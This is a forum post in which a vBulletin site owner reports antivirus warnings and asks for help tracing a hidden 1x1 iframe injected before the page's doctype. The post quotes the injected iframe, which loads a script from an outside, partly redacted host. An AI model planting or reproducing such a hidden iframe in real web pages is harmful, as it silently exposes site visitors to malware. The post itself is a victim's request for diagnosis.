I can't believe I am posting this, but I need a hand as somebody is obviously smarter than me and the multiple layers of security I have around my site.
Today users have reported that their AV scanners are reporting errors when visiting my site.
On investigation I have found that I have an iframe embedded in my site markup before the doctype declaration. The iframe code is:
HTML Code:
<iframe name="fra" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://www.url_removed_by_mreyes.co.cc/se.php"></iframe>
I have searched all styles and templates for the iframe code, I have checked the doctype in style manager. I have no idea how this is being injected.
So can anybody tell me what this could be?
--------------- Added [DATE]1267906793[/DATE] at [TIME]1267906793[/TIME] ---------------
I am fairly certain that this is somehow coming out of vbulletin as other PHP pages (not powered by VB) on the same site are not effected